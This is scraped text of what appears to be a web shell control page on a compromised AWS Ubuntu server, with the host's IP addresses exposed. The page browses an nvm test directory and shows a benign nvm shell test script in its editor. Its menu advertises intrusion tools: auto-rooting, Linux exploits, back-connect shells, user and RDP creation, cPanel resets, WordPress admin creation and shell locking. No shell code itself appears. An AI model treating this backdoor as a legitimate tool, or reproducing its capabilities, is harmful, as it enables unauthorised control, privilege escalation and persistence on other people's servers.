Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.118.209.158
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
test /
installation_iojs /
[ HOME SHELL ]
Name
Size
Permission
Action
install already installed uses...
1007
B
-rwxrwxr-x
install from binary
996
B
-rwxrwxr-x
install from source
664
B
-rw-rw-r--
install two versions and use t...
924
B
-rwxrwxr-x
install version specified in ....
652
B
-rwxrwxr-x
install version specified in ....
632
B
-rw-rw-r--
install while reinstalling pac...
1.13
KB
-rwxrwxr-x
nvm install v1 works
679
B
-rwxrwxr-x
setup_dir
62
B
-rwxrwxr-x
teardown_dir
243
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install two versions and use the latest one
#!/bin/sh die () { echo "$@" ; exit 1; } \. ../../nvm.sh # Remove the stuff we're clobbering. [ -e "${NVM_DIR}/versions/io.js/v1.0.0" ] && rm -R "${NVM_DIR}/versions/io.js/v1.0.0" [ -e "${NVM_DIR}/versions/io.js/v1.0.1" ] && rm -R "${NVM_DIR}/versions/io.js/v1.0.1" # Install from binary nvm install iojs-v1.0.0 || die "'nvm install iojs-v1.0.0' failed" nvm i iojs-v1.0.1 || die "'nvm i iojs-v1.0.1' failed" # Check [ -d "${NVM_DIR}/versions/io.js/v1.0.0" ] || die "iojs v1.0.0 didn't exist" [ -d "${NVM_DIR}/versions/io.js/v1.0.1" ] || die "iojs v1.0.1 didn't exist" # Use the first one nvm use iojs-1.0.0 || die "'nvm use iojs-1.0.0' failed" # Use the latest one nvm use iojs-1 || die "'nvm use iojs-1' failed" [ "_$(node --version)" = "_v1.0.1" ] || die "'node --version' was not v1.0.1, got: $(node --version)" [ "_$(iojs --version)" = "_v1.0.1" ] || die "'iojs --version' was not v1.0.1, got: $(iojs --version)"
Close